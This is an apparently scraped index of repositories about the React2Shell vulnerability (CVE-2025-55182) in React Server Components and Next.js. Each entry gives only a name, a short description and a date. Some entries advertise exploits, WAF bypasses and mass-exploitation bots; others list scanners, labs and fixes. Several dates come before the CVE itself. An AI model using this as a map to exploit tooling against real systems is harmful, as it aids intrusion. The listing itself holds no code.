React2Shell Scanner (CVE-2025-55182 & CVE-2025-66478)
|
CymulateResearch | 2 | 0 | 2025-12-04 | View |
|
Saturate/CVE-2025-55182-Scanner
A bash scanner for detecting CVE-2025-55182 vulnerability in Next.js applications
|
Saturate | 2 | 0 | 2025-12-05 | View |
|
logesh-GIT001/CVE-2025-55182
"One crafted HTTP request can compromise your entire server." — React Security Team, Dec 2025
|
logesh-GIT001 | 2 | 0 | 2025-12-05 | View |
|
kindone09/CVE-2025-55182
|
kindone09 | 2 | 0 | 2025-12-05 | View |
|
rapticore/ore_react2shell_scanner
CVE-2025-55182 (React2Shell) Scanner
|
rapticore | 2 | 0 | 2025-12-06 | View |
|
cypholab/evilact
Fast scanner for detecting and confirming Next.js RCE vulnerabilities (CVE-2025-55182 & CVE-2025-66478).
|
cypholab | 2 | 0 | 2025-12-06 | View |
|
Archerkong/CVE-2025-55182
CVE-2025-55182 poc
|
Archerkong | 2 | 0 | 2025-12-06 | View |
|
philparzer/nextjs-react2shell-detect
chrome extension to detect next.js sites vulnerable to CVE-2025-55182 (react2shell)
|
philparzer | 2 | 0 | 2025-12-06 | View |
|
zamdevio/r2s
Advanced security testing tool for CVE-2025-55182 vulnerability assessment in Next.js applications. Features interactive...
|
zamdevio | 2 | 0 | 2025-12-06 | View |
|
SainiONHacks/CVE-2025-55182-Scanner
A standalone GUI tool to detect and demonstrate the **React Server Components Remote Code Execution (RCE)** vulnerabilit...
|
SainiONHacks | 2 | 0 | 2025-12-07 | View |
|
LucasPDiniz/CVE-2025-55182
React2Shell Vulnerability
|
LucasPDiniz | 2 | 0 | 2025-12-08 | View |
|
Security-Phoenix-demo/react2shell-scanner-CVE-2025-55182
React2shell-web-scanner
|
Security-Phoenix-demo | 2 | 0 | 2025-12-08 | View |
|
vulncheck-oss/cve-2025-55182
VulnCheck CVE-2025-55182 react2shell
|
vulncheck-oss | 2 | 0 | 2025-12-08 | View |
|
joelvaiju/react2shell-CVE-2025-55182-poc
a simple react2shell poc with basic waf bypass
|
joelvaiju | 2 | 0 | 2025-12-09 | View |
|
dr4xp/react2shell
A critical vulnerability in React Server Components affecting React 19 (CVE-2025-55182) and frameworks that use it like ...
|
dr4xp | 2 | 0 | 2025-12-09 | View |
|
Nkwenti-Severian-Ndongtsop/POC_react2shell_CVE-2025-55182
|
Nkwenti-Severian-Ndongtsop | 2 | 0 | 2025-12-11 | View |
|
sangleshubham/React-Security-CVE-2025-55182-Exploit
NodeJS-based exploit script and scanner for the React Server Components "React2Shell" vulnerability (CVE-2025-55182).
|
sangleshubham | 2 | 0 | 2025-12-13 | View |
|
subhdotsol/CVE-2025-55182
This project provides a fully functional demonstration of CVE-2025-55182 (React2Shell) - a critical Remote Code Executio...
|
subhdotsol | 2 | 0 | 2025-12-15 | View |
|
ceh-aditya-raj/CVE-2025-55182
Proof-of-concept research tool for CVE-2025-55182, a critical unauthenticated RCE in Next.js App Router caused by server...
|
ceh-aditya-raj | 2 | 0 | 2025-12-17 | View |
|
lucyz1125/CVE-2025-55182-Next.js-RCE
Nextjs RCE Exploit
|
lucyz1125 | 2 | 0 | 2026-01-05 | View |
|
Faithtiannn/CVE-2025-55182
CVE-2025-55182漏洞检测工具
|
Faithtiannn | 2 | 0 | 2026-01-11 | View |
|
MemerGamer/CVE-2025-55182
CVE-2025-55182
|
MemerGamer | 2 | 0 | 2026-01-22 | View |
|
Sairbo/Unihackers---CVE-2025-55182-
|
Sairbo | 2 | 0 | 2026-01-23 | View |
|
MuhammadUwais/React2Shell
A Firefox extension for detecting React2Shell vulnerabilities (CVE-2025-55182 & CVE-2025-66478) in web applications.
|
MuhammadUwais | 2 | 0 | 2026-02-03 | View |
|
Atlantis02-sec/Vulnerability-assessment
nmap nse for detecting React2Shell (CVE-2025-55182)
|
Atlantis02-sec | 1 | 1 | 2025-12-05 | View |
|
f0xyx/CVE-2025-55182-Scanner
Security scanner for CVE-2025-55182 - Critical RCE vulnerability in React Server Components
|
f0xyx | 1 | 1 | 2025-12-05 | View |
|
greenheadHQ/CVE-2025-55182
|
greenheadHQ | 1 | 1 | 2025-12-06 | View |
|
rsch-io/CVE-2025-55182-React2Shell
React2Shell (CVE-2025-55182) proof-of-concept (PoC) exploit demonstrating a CRITICAL remote code execution (RCE) vulnera...
|
rsch-io | 1 | 1 | 2025-12-09 | View |
|
CerberusMrX/Cerberus-React2Shell-Scanner-Exploit
Elite exploitation toolkit for CVE-2025-55182 (React Server Components RCE). Async polymorphic payloads, advanced WAF/CD...
|
CerberusMrX | 1 | 1 | 2025-12-10 | View |
|
Machine-farmer/PunchingBag-for-React2Shell
Intentionally vulnerable Next.js app for CVE-2025-55182 security research and CTF challenges
|
Machine-farmer | 1 | 1 | 2025-12-11 | View |
|
j0lt-github/react2shell-burp
Burp Suite extension for identifying the React Server Components unsafe deserialization vulnerability (React2Shell / CVE...
|
j0lt-github | 1 | 1 | 2025-12-11 | View |
|
mantvmass/react2shell
A CLI tool that exploits vulnerabilities in React Server Components and Server Actions (CVE-2025-55182, CVE-2025-66478) ...
|
mantvmass | 2 | 0 | 2025-12-13 | View |
|
ProwlSec/React2Shell
An advanced command-line framework for discovery, validation, and exploitation of CVE-2025-55182 and CVE-2025-66478 aff...
|
ProwlSec | 1 | 1 | 2025-12-14 | View |
|
M4rgs/CVE-2025-55182-React2Shell-Exploit
A proof-of-concept tool for demonstrating the critical React2Shell vulnerability
|
M4rgs | 1 | 1 | 2025-12-16 | View |
|
rahuulmiishra/react2shell-CVE-2025-55182
|
rahuulmiishra | 1 | 1 | 2026-01-03 | View |
|
cahyod/react2shell
Alat ini mendeteksi potensi kerentanan React2Shell (CVE-2025-55182) dalam proyek React dengan memeriksa: - File `package...
|
cahyod | 1 | 1 | 2025-12-08 | View |
|
LC-pro/CVE-2025-55182-EXP
|
LC-pro | 2 | 0 | 2025-12-11 | View |
|
theman001/CVE-2025-55182
CVE-2025-55182 React RCE Test Program
|
theman001 | 2 | 0 | 2025-12-08 | View |
|
Asder10/React2Shell
🔍 Exploit CVE-2025-55182 vulnerabilities in Next.js and React with this efficient framework for rapid testing and assess...
|
Asder10 | 1 | 1 | 2026-01-08 | View |
|
wiixx44/CVE-2025-55182
🔍 Demonstrate CVE-2025-55182, a critical vulnerability in React Server Components allowing unauthenticated arbitrary cod...
|
wiixx44 | 1 | 1 | 2021-09-18 | View |
|
Emiyelbarto/CVE-2025-55182-PoC
Poc for CVE-2025-55182
|
Emiyelbarto | 1 | 0 | 2025-12-04 | View |
|
Herick-Costa/CVE-2025-55182-React2Shell-RCE
React2Shell (CVE-2025-55182) PoC
|
Herick-Costa | 1 | 0 | 2026-06-29 | View |
|
SentinelXofficial/CVE-2025-55182
PoC exploit for CVE-2025-55182 (React2Shell) — Pre-auth RCE in React Server Components | CVSS 10.0
|
SentinelXofficial | 1 | 0 | 2026-06-16 | View |
|
Alejandro609x/JEFAZO-CVE-2025-55182-Checker
Escáner pasivo de seguridad para CVE-2025-55182 que identifica indicadores públicos asociados a Next.js y React Server C...
|
Alejandro609x | 0 | 1 | 2026-06-11 | View |
|
harness-security-labs/CVE-2025-55182-checker
React/Next.js React4Shell RCE CVE-2025-55182 checker
|
harness-security-labs | 1 | 0 | 2025-12-04 | View |
|
hakkuri01/r2rs
Interactive Ruby shell for authorized CVE-2025-55182 (react2shell) testing
|
hakkuri01 | 1 | 0 | 2026-05-31 | View |
|
K3ysTr0K3R/CVE-2025-55182-EXPLOIT
|
K3ysTr0K3R | 1 | 0 | 2026-05-01 | View |
|
sonnycroco/HTB-Reactor-Linux-Machine---Walkthrough
Full walkthrough of HTB's Reactor machine — exploit CVE-2025-55182 to gain a shell, then get root via an exposed Node.js...
|
sonnycroco | 1 | 0 | 2026-05-28 | View |
|
SpeatX/React2Shell-CVE-2025-55182
CVE-2025-55182 — Unauthenticated RCE in React Server Components (React2Shell). CVSS 10.0 exploit tool for authorized pen...
|
SpeatX | 1 | 0 | 2026-05-24 | View |
|
renewablehacking/CVE-2025-55182-React-19.2.0
|
renewablehacking | 1 | 0 | 2026-05-23 | View |
|
Y3B3L4Y3/CVE-2025-55182-test
|
Y3B3L4Y3 | 1 | 0 | 2025-12-05 | View |
|
RewantChaudhari/nextjs-rce-incident-response
Real-world incident response for CVE-2025-55182 (React2Shell) — script injection, server remediation, and post-incident ...
|
RewantChaudhari | 0 | 1 | 2026-04-11 | View |
|
Airis101/CVE-2025-55182-analysis
浅谈React Server Components RCE 漏洞分析
|
Airis101 | 1 | 0 | 2025-12-05 | View |
|
GarethMSheldon/React2Shell-CVE-2025-55182-Detector
|
GarethMSheldon | 1 | 0 | 2025-12-05 | View |
|
DelvyGonzalez/react2shell-security-toolkit
Security toolkit to detect CVE-2025-55182 (React2Shell) vulnerability
|
DelvyGonzalez | 1 | 0 | 2025-12-07 | View |
|
UmmItKin/CVE-2025-55182-PoC
react2shell PoC with Go / CVE-2025-55182
|
UmmItKin | 1 | 0 | 2025-12-07 | View |
|
arashiyans/CVE-2025-55182-CVE-2025-66478
scanner testing
|
arashiyans | 1 | 0 | 2025-12-08 | View |
|
Benrich127N/react2shell_analyzer
a dart package to analyze CVE-2025-55182 react2shell
|
Benrich127N | 1 | 0 | 2025-12-08 | View |
|
hamm0nz/react2shell-audit
A lightweight, recursive Bash script to detect Next.js and React Server DOM versions vulnerable to CVE-2025-55182 (React...
|
hamm0nz | 1 | 0 | 2025-12-08 | View |
|
FurkanKAYAPINAR/ReactNext2Shell
CVE-2025-55182 and CVE-2025-66478
|
FurkanKAYAPINAR | 1 | 0 | 2025-12-08 | View |
|
jan0x190/CVE-2025-55182-Simple-Scanner-main
|
jan0x190 | 1 | 0 | 2025-12-08 | View |
|
Shield-Cyber/react2shell-scanner
Scanner to detect the presence of CVE-2025-55182 & CVE-2025-66478 on targeted web services.
|
Shield-Cyber | 1 | 0 | 2025-12-08 | View |
|
sun977/CVE-2025-55182
CVE-2025-55182 检测方式和攻击利用
|
sun977 | 1 | 0 | 2025-12-09 | View |
|
zxz3650/CVE-2025-55182-POC
CVE-2025-55182-POC
|
zxz3650 | 0 | 1 | 2025-12-07 | View |
|
h0tak88r/next88
High-performance Go implementation for detecting React Server Components RCE vulnerabilities (CVE-2025-55182 & CVE-2025-...
|
h0tak88r | 0 | 1 | 2025-12-13 | View |
|
Ya0h4cker/CVE-2025-55182
Analysis, Validation Environment, and POC for CVE-225-55182 Vulnerability.
|
Ya0h4cker | 0 | 1 | 2025-12-13 | View |
|
pwnxpl0it/react2shell-lab
React2shell vulnerable lab (CVE-2025-55182)
|
pwnxpl0it | 0 | 1 | 2025-12-17 | View |
|
fevra-dev/GitExpose
Advanced security scanner detecting exposed files, React2Shell (CVE-2025-55182), ML model poisoning, LLM infrastructure ...
|
fevra-dev | 1 | 0 | 2026-01-14 | View |
|
0xBlackash/CVE-2025-55182
CVE-2025-55182
|
0xBlackash | 0 | 1 | 2026-02-23 | View |
|
MrMahile/MassScanning-CVE-2025-55182
A lightweight orchestrator and worker scanner setup for running large/continuous scans across split input files. This re...
|
MrMahile | 0 | 1 | 2026-02-26 | View |
|
meneim99/react2shell-scanner
🔍 Detect vulnerabilities CVE-2025-55182 and CVE-2025-66478 in Next.js apps with this reliable command-line scanner.
|
meneim99 | 1 | 0 | 2023-11-27 | View |
|
l0lsec/cve-2025-55182-lab
Intentionally vulnerable Next.js RSC Docker lab for CVE-2025-55182 (React2Shell) local testing
|
l0lsec | 0 | 1 | 2026-03-25 | View |
|
aspen-labs/CVE-2025-55182-checker
React/Next.js React4Shell RCE CVE-2025-55182 checker
|
aspen-labs | 1 | 0 | 2025-12-04 | View |
|
Pa2sw0rd/exploit-CVE-2025-55182-poc
This POC demonstrates CVE-2025-55182 using actual `[email protected]` vulnerable code.
|
Pa2sw0rd | 1 | 0 | 2025-12-04 | View |
|
mingyisecurity-lab/CVE-2025-55182-TOOLS
A Comprehensive CVE-2025-55182 Detection and Security Assessment Tool
|
mingyisecurity-lab | 1 | 0 | 2025-12-04 | View |
|
ivaavimusic/React19-fix-vibecoders
CVE-2025-55182 Fix for Vibe Coders
|
ivaavimusic | 1 | 0 | 2025-12-04 | View |
|
MedusaSH/POC-CVE-2025-55182
PoC CVE-2025-55182
|
MedusaSH | 1 | 0 | 2025-12-04 | View |
|
clevernyyyy/CVE-2025-55182-Dockerized
|
clevernyyyy | 1 | 0 | 2025-12-04 | View |
|
ABCFabian/React2Shell-CVE-2025-55182-Testing-Environment
A containerized testing environment for CVE-2025-55182, a critical (10.0 CVSS) Remote Code Execution vulnerability in Re...
|
ABCFabian | 1 | 0 | 2025-12-05 | View |
|
imbas007/POC-CVE-2025-55182
|
imbas007 | 1 | 0 | 2025-12-05 | View |
|
rl0x01/CVE-2025-55182_PoC
Proof-of-Concept RCE pour CVE‑2025‑55182 exploitant le protocole React Flight sur Next.js App Router.
|
rl0x01 | 1 | 0 | 2025-12-05 | View |
|
subzer0x0/React2Shell
React2Shell (CVE-2025-55182) – An intentionally vulnerable Next.js application created for educational and research purp...
|
subzer0x0 | 1 | 0 | 2025-12-05 | View |
|
ceortiz33/CVE-2025-55182
Proof of Concept for React2Shell vulnerability
|
ceortiz33 | 1 | 0 | 2025-12-05 | View |
|
xkey8/react2shell
PoC for React2Shell (CVE-2025-55182)
|
xkey8 | 1 | 0 | 2025-12-05 | View |
|
rocklambros/React2Shell_Hunter
AWS Organization-wide detection toolkit for CVE-2025-55182 & CVE-2025-66478 (React Server Components / Next.js RCE vulne...
|
rocklambros | 1 | 0 | 2025-12-06 | View |
|
sohaibeb/CVE-2025-55182
CVE-2025-55182 PoC Exploit
|
sohaibeb | 1 | 0 | 2025-12-06 | View |
|
Qixinlee/CVE-2025-55182-Scanner
Automated scanner for CVE-2025-55182: a critical RCE vulnerability in React Server Components and Next.js.
|
Qixinlee | 1 | 0 | 2025-12-07 | View |
|
Night-have-dreams/CVE-2025-55182-PoC
CVE-2025-55182 PoC
|
Night-have-dreams | 1 | 0 | 2025-12-08 | View |
|
0xsj/CVE-2025-55182
|
0xsj | 1 | 0 | 2025-12-08 | View |
|
0xSalm0n/CVE-2025-55182
|
0xSalm0n | 1 | 0 | 2025-12-08 | View |
|
HUAHUAI23/CVE-2025-55182-POC
|
HUAHUAI23 | 1 | 0 | 2025-12-08 | View |
|
racall/cve-2025-55182-node
CVE-2025-55182 Next.js RCE Exploit Tool
|
racall | 1 | 0 | 2025-12-08 | View |
|
ancs21/react2shell-scanner-rust
Detect CVE-2025-55182 & CVE-2025-66478 in Next.js/RSC applications (Rust)
|
ancs21 | 1 | 0 | 2025-12-09 | View |
|
keshavyaduvans/cve-2025-55182
|
keshavyaduvans | 1 | 0 | 2025-12-09 | View |
|
Yyax13/CVE-2025-55182
RCE exploitation tool targeting CVE-2025-55182, a critical vulnerability in React Server Components (RSC) affecting Reac...
|
Yyax13 | 1 | 0 | 2025-12-09 | View |
|
ihsansencan/React2Shell-CVE-2025-55182
* React2Shell-CVE-2025-55182
|
ihsansencan | 1 | 0 | 2025-12-09 | View |
|
theman001/CVE-2025-55182_PoC-Test-Server
CVE-2025-55182 React RCE Test Server
|
theman001 | 1 | 0 | 2025-12-10 | View |
|
JahazielLem/NSE_CVE-2025-55182
Nmap NSE script for scanning React2Shell (CVE-2025-55182)
|
JahazielLem | 1 | 0 | 2025-12-10 | View |
|
Saad-Ayady/react2shellNSE
nmap script to scan react2shell (CVE-2025-55182 and CVE-2025-66478) Vulnerability
|
Saad-Ayady | 1 | 0 | 2025-12-10 | View |
|
mrmtwoj/React2Shell-CVE-2025-55182
Educational / research tool related to React / Next.js vulnerability CVE‑2025‑55182 (“React2Shell”).
|
mrmtwoj | 1 | 0 | 2025-12-11 | View |
|
mounta11n/CHECK-CVE-2025-55182-AND-CVE-2025-66478
Check if your server is affected by CVE-2025-55182 & CVE-2025-66478
|
mounta11n | 1 | 0 | 2025-12-13 | View |
|
VVVI5HNU/CVE-2025-55182
Proof-of-Concept for CVE-2025-55182, a critical unauthenticated RCE in React Server Components.
|
VVVI5HNU | 1 | 0 | 2025-12-14 | View |
|
mivmi/CVE-2025-55182
|
mivmi | 1 | 0 | 2025-12-15 | View |
|
EQSTLab/CVE-2025-55182
React2Shell
|
EQSTLab | 1 | 0 | 2025-12-16 | View |
|
lamaper/CVE-2025-55182-Toolbox
|
lamaper | 1 | 0 | 2025-12-19 | View |
|
xxxTectationxxx/React2Shell-CVE-Lab
A self-hosted vulnerable Next.js environment running on Docker for simulating CVE-2025-55182. Built for educational secu...
|
xxxTectationxxx | 1 | 0 | 2025-12-20 | View |
|
vonuyvicoo/nextploiter
NextJS exploiter for CVE-2025-55182 and more.
|
vonuyvicoo | 1 | 0 | 2025-12-21 | View |
|
S3cr3t-SDN/React4Shell
Exploit Code for React2Shell RCE vulnerability (CVE-2025-55182) affecting React Server Components 19.0.0-19.2.0. Exploit...
|
S3cr3t-SDN | 1 | 0 | 2025-12-22 | View |
|
itsismarcos/Bot-exploit-CVE-2025-55182
Mass Bot Exploit
|
itsismarcos | 1 | 0 | 2025-12-26 | View |
|
kanyokoo/React-Server-Components-Remote-Code-Execution-CVE-2025-55182-
script to help solve the lab on hackviser covering (CVE-2025-55182)
|
kanyokoo | 1 | 0 | 2025-12-26 | View |
|
captain4554/CVE-2025-55182-Scanner
🛡️ Scan and assess vulnerabilities in Next.js/Waku with the CVE-2025-55182-Scanner, combining static and dynamic analysi...
|
captain4554 | 1 | 0 | 2026-01-02 | View |
|
xiaoLvChen/CVE-2025-55182
CVE-2025-55182(React Server Components 反序列化远程代码执行漏洞)
|
xiaoLvChen | 1 | 0 | 2026-01-01 | View |
|
captain4554/captain4554.github.io
🔍 Scan for CVE-2025-55182 vulnerabilities with a hybrid tool that combines static and dynamic analysis for improved secu...
|
captain4554 | 1 | 0 | 2026-01-02 | View |
|
m3ngx1ng/CVE-2025-55182-GUI
CVE-2025-55182 漏洞检测与利用工具(GUI版)
|
m3ngx1ng | 1 | 0 | 2026-01-03 | View |
|
woorifisa-service-dev-6th/tech-seminar-React2Shell
[우리 FISA] 기술 세미나 우승 - 클라우드 서비스 개발 6기 3팀 - React2Shell (CVE-2025-55182) 분석 및 연구
|
woorifisa-service-dev-6th | 1 | 0 | 2026-02-02 | View |
|
George0Papasotiriou/CVE-2025-55182-React2Shell-CVSS-10.0-
|
George0Papasotiriou | 1 | 0 | 2026-02-10 | View |
|
Wyl-cmd/CVE-2025-55182
针对 Next.js 原型污染漏洞 (CVE-2025-55182) 的高效批量检测工具。
|
Wyl-cmd | 1 | 0 | 2026-02-13 | View |
|
orgito1015/CVE-2025-55182-Researching-process
|
orgito1015 | 1 | 0 | 2026-02-18 | View |
|
luoluoqingge/CVE-2025-55182
|
luoluoqingge | 1 | 0 | 2026-03-18 | View |
|
aliksir/nextjs-security-scanner
Bash script to detect CVE-2025-55182 (React2Shell) and credential exposure in Next.js projects. Zero dependencies.
|
aliksir | 1 | 0 | 2026-04-03 | View |
|
alyaapm/CVE-2025-55182-shellinteractive
|
alyaapm | 0 | 1 | 2024-11-29 | View |
|
Mayca369/CVE-2025-55182
🚨 Exploit CVE-2025-55182 to demonstrate RCE in React Server Functions, highlighting risks from insecure prototype refere...
|
Mayca369 | 0 | 1 | 2025-06-06 | View |
|
joshterrill/CVE-2025-55182-realistic-poc
a realistic POC demonstrating the missing `hasOwnProperty` check in [email protected]
|
joshterrill | 0 | 1 | 2025-12-04 | View |
|
gagaltotal/tot-react-rce-CVE-2025-55182
CVE-2025-55182 – CVE-2025-66478 – React2Shell
|
gagaltotal | 1 | 0 | 2025-12-12 | View |
|
BrianLopezM99/react2shell-CVE-2025-55182
An exploitation tool for the Next.js vulnerability CVE-2025-55182 that allows remote command execution through a poisoni...
|
BrianLopezM99 | 1 | 0 | 2026-02-09 | View |
|
Gymnott1/CVE-2025-55182
|
Gymnott1 | 1 | 0 | 2025-12-10 | View |
|
emadshanab/POC-for-CVE-2025-55182
POC for CVE-2025-55182
|
emadshanab | 1 | 0 | 2025-12-05 | View |
|
iksanwkk/CVE-2025-55182-exp
🚨 Exploit CVE-2025-55182, a critical RCE vulnerability in React Server Components for Next.js apps; enables testing for ...
|
iksanwkk | 1 | 0 | 2024-04-24 | View |
|
phornnato/CVE-2025-55182
🚨 Exploit and scan for CVE-2025-55182, a critical React/Next.js vulnerability enabling remote code execution through pro...
|
phornnato | 1 | 0 | 2024-05-28 | View |
|
andrei2308/react2shell
CVE-2025-55182
|
andrei2308 | 1 | 0 | 2025-12-11 | View |
|
mahaveer-choudhary/CVE-2025-55182
A Python-based security scanner for detecting and exploiting **React Server Components (RSC)** vulnerabilities in Next.j...
|
mahaveer-choudhary | 0 | 1 | 2025-12-19 | View |
|
ahmed-dev-op/CVE-2025-55182
⚠️ Explore a vulnerable environment to test security scanners against the CVE-2025-55182 RCE flaw in React Server Compon...
|
ahmed-dev-op | 1 | 0 | 2025-07-15 | View |
|
amnsecurity/reactorwatch-pentest
☢️ ReactorWatch v3.2.1 — Nuclear Reactor Core Monitoring System Pentest | CVE-2025-55182 (React2Shell) Unauthenticated R...
|
amnsecurity | 0 | 0 | 2026-07-10 | View |
|
xp101t/react2shell
PoC for CVE-2025-55182 React2Shell
|
xp101t | 0 | 0 | 2026-07-09 | View |
|
RootEvil333/CVE-2025-55182
Exploit for CVE-2025-55182
|
RootEvil333 | 0 | 0 | 2026-07-08 | View |
|
diamorphine666/React2shell-CVE-2025-55182-Exploit
Next.js / RSC - Unauthenticated RCE (React2Shell) (CVE-2025-55182)
|
diamorphine666 | 0 | 0 | 2026-07-06 | View |
|
k1llmelira/react2shell-exploit
React2Shell: CVE-2025-55182 exploit from tryhackme‼️
|
k1llmelira | 0 | 0 | 2026-06-28 | View |
|
litndat/React2Shell-PoC-CVE-2025-55182
Khai thác lỗ hổng bảo mật CVE-2025-55182
|
litndat | 0 | 0 | 2026-06-24 | View |
|
avoidme12/CVE-2025-55182-POC
React2Shell POC
|
avoidme12 | 0 | 0 | 2026-06-22 | View |
|
Fomovet/cve-2025-55182
POC for CVE-2025-55182
|
Fomovet | 0 | 0 | 2026-06-21 | View |
|
cc3305/CVE-2025-55182
CVE-2025-55182 exploit script
|
cc3305 | 0 | 0 | 2026-06-13 | View |
|
AkhmadKholmurodov/React2Shell_Exploit
I created simple react2shell CVE-2025-55182 python exploit
|
AkhmadKholmurodov | 0 | 0 | 2026-06-09 | View |
|
huangzccn/CVE-2025-55182
CVE-2025-55182
|
huangzccn | 0 | 0 | 2025-12-05 | View |
|
TechWithOrgito/CVE-2025-55182-Researching-process
|
TechWithOrgito | 0 | 0 | 2026-06-06 | View |
|
rvzsec/react2shell
react2shell - CVE-2025-55182 (Next.js: CVE-2025-66478) - Unauthenticated RCE in React Server Components (Flight Protocol...
|
rvzsec | 0 | 0 | 2026-06-05 | View |
|
yurahshell/CVE-2025-55182
|
yurahshell | 0 | 0 | 2026-06-05 | View |
|
tanvirahmedcs/CVE-2025-55182
react CVE-2025-55182
|
tanvirahmedcs | 0 | 0 | 2026-06-05 | View |
|
tamagorengs/react2shell-poc-CVE-2025-55182
|
tamagorengs | 0 | 0 | 2025-12-20 | View |
|
LuizHenz/PoC-CVE-2025-55182
|
LuizHenz | 0 | 0 | 2026-05-29 | View |
|
alphad4n/COMPLETE-CVE-2025-55182
|
alphad4n | 0 | 0 | 2025-12-12 | View |
|
Jeanback1/react-rsc-cve-2025-55182-lab
Educational lab demonstrating CVE-2025-55182: Critical RCE in React Server Components via prototype pollution in the Fli...
|
Jeanback1 | 0 | 0 | 2026-05-26 | View |
|
lvx9101-ux/CVE-2025-55182
|
lvx9101-ux | 0 | 0 | 2026-05-25 | View |
|
w3nch/CVE-2025-55182-in-go
|
w3nch | 0 | 0 | 2026-05-24 | View |
|
Industri4l-H3ll-Xpl0it3rs/CVE-2025-55182-React2Shell
CVE-2025-55182 Exploit | by infrar3d
|
Industri4l-H3ll-Xpl0it3rs | 0 | 0 | 2026-05-19 | View |
|
ycseo-git/CVE-2025-55182
a.k.a. React2Shell
|
ycseo-git | 0 | 0 | 2026-05-18 | View |
|
MuharremK0/Info-Sys-Security-CVE-2025-55182
|
MuharremK0 | 0 | 0 | 2026-05-17 | View |
|
open-flaw/CVE-2025-55182
|
open-flaw | 0 | 0 | 2025-12-19 | View |
|
unixskid/CVE-2025-55182-React2Shell
|
unixskid | 0 | 0 | 2026-02-25 | View |
|
bakhod1r/CVE-2025-55182
|
bakhod1r | 0 | 0 | 2025-12-10 | View |
|
muthaiyanmani/react2shell-checker
A security vulnerability scanner for detecting the React2Shell vulnerability (CVE-2025-55182) in Next.js and React appli...
|
muthaiyanmani | 0 | 0 | 2025-12-08 | View |
|
Theori-lO/reactguard
ReactGuard provides framework- and vulnerability-detection tooling for CVE-2025-55182 (React2Shell)
|
Theori-lO | 0 | 0 | 2026-04-29 | View |
|
Cybersecurity-Enthusiasts-CE/CVE-2025-55182-Researching-process
|
Cybersecurity-Enthusiasts-CE | 0 | 0 | 2026-04-25 | View |
|
joaoreis13/flight-risk
Security toolkit for CVE-2025-55182 (React2Shell) — scan, detect, correlate, and test React Server Components RCE vulner...
|
joaoreis13 | 0 | 0 | 2026-04-22 | View |
|
devianntsec/CVE-2025-55182
Advanced security research on CVE-2025-55182 (React2Shell). Features an exploitation framework with 6 functional impact ...
|
devianntsec | 0 | 0 | 2026-03-25 | View |
|
Mohamedniane/cve-2025-55182-analysis
Security research & exploitation analysis of CVE-2025-55182 (React) — CVSS + OWASP Top 10 mapping
|
Mohamedniane | 0 | 0 | 2026-04-18 | View |
|
opsecramdan/react2shell-cve-2025-55182
|
opsecramdan | 0 | 0 | 2026-04-15 | View |
|
masterwok/PoC-CVE-2025-55182
CVE-2025-55182 (React2Shell) PoC: Unauthenticated RCE affecting React 19.x and Next.js < 15.1.4. Exploits vulnerabilitie...
|
masterwok | 0 | 0 | 2026-04-10 | View |
|
DeDnY/CVE-2025-55182-poc-panel
This is a special panel that is used to send POC requests with the output of responses.
|
DeDnY | 0 | 0 | 2026-04-13 | View |
|
AbdullahMaqbool22/Explosive-As-Hell-MCS-Qualifer-Web-500
[First-Blood-XO] React Server Component endpoint vulnerable to CVE-2025-55182 (RCE) → enumerated SUID binaries → /usr/bi...
|
AbdullahMaqbool22 | 0 | 0 | 2026-04-13 | View |
|
oscar-mine/R2SAE
Firefox extension for detecting and exploiting CVE-2025-55182 — Prototype Pollution RCE in Next.js React Server Actions
|
oscar-mine | 0 | 0 | 2026-04-12 | View |
|
kaxm23/rust-cve-2025-55182-scanner
powerfull rust cve-2025-55182-scanner used for ctf & ethical purpose only
|
kaxm23 | 0 | 0 | 2026-04-10 | View |
|
kaxm23/CVE-2025-55182-Auto-Scanner
CVE-2025-55182 Auto Scanner - Improved Version For authorized CTF/testing purposes only
|
kaxm23 | 0 | 0 | 2026-04-10 | View |
|
masterwok/CVE-2025-55182-React2Shell-PoC
Proof-of-concept exploit for CVE-2025-55182 (React2Shell)
|
masterwok | 0 | 0 | 2026-04-10 | View |
|
unixskid/CVE-2025-55182-Interactive-mode
|
unixskid | 0 | 0 | 2026-02-25 | View |
|
Dread1ess/CVE-2025-55182
A critical-severity vulnerability in React Server Components (CVE-2025-55182) affects React 19 and frameworks that use i...
|
Dread1ess | 0 | 0 | 2025-12-06 | View |
|
mayank729/CVE-2025-55182-scanner
🔍 Scan for CVE-2025-55182 risks in React Server Components with this non-intrusive tool that helps detect critical vulne...
|
mayank729 | 0 | 0 | 2022-06-17 | View |
|
RajChowdhury240/React2Shell-CVE-2025-55182
React2Shell | CVE-2025-55182 - React Server Components RCE
|
RajChowdhury240 | 0 | 0 | 2025-12-05 | View |
|
mohit121312/CVE-2025-55182_full_exploit
this repo have CVE-2025-55182 full exploit with RCE
|
mohit121312 | 0 | 0 | 2025-12-05 | View |
|
I3r1h0n/React2Shell
My research on CVE-2025-55182
|
I3r1h0n | 0 | 0 | 2025-12-06 | View |
|
zorejt/Rust_CVE-2025-55182
|
zorejt | 0 | 0 | 2025-12-06 | View |
|
yunaranyancat/CVE-2025-55182-NSE
Meow
|
yunaranyancat | 0 | 0 | 2025-12-06 | View |
|
MrSol0/CVE-2025-55182-Terminal
This is a POC for testing your projects that are vulnerable to CVE-2025-55182 with a terminal and ability to scan a list
|
MrSol0 | 0 | 0 | 2025-12-06 | View |
|
Bashamega/react-CVE-2025-55182-fixer
Patches CVE-2025-55182 in your repositories
|
Bashamega | 0 | 0 | 2025-12-06 | View |
|
orgito1015/CVE-2025-55182-RCE-Exploit
More exploit-focused; great for security research repos.
|
orgito1015 | 0 | 0 | 2025-12-06 | View |
|
aastikgakhar/CVE-2025-55182-react2shell
Detects exposed React Server Components vulnerable to CVE-2025-55182 via RSC negotiation.
|
aastikgakhar | 0 | 0 | 2025-12-06 | View |
|
0xN7y/CVE-2025-55182
Poc for CVE-2025-55182
|
0xN7y | 0 | 0 | 2025-12-06 | View |
|
shreyas-malhotra/React2Shell-CVE-2025-55182
A minimal RCE PoC for CVE-2025-55182
|
shreyas-malhotra | 0 | 0 | 2025-12-06 | View |
|
MikeTheHash/CVE-2025-55182
A modified and a little boosted exploit for CVE-2025-55182, React2Shell: Pre-authentication Remote Code Execution in Rea...
|
MikeTheHash | 0 | 0 | 2025-12-06 | View |
|
jumodada/react-cve-2025-55182-demo
|
jumodada | 0 | 0 | 2025-12-07 | View |
|
shakilkhatri/scanner-for-CVE-2025-55182-vulnerability
CVE-2025-55182 Detector. Find which of your GitHub repositories are exposed to the critical React/Next.js RCE vulnerabil...
|
shakilkhatri | 0 | 0 | 2025-12-07 | View |
|
hunter24x24/CVE-2025-55182-mass
|
hunter24x24 | 0 | 0 | 2025-12-07 | View |
|
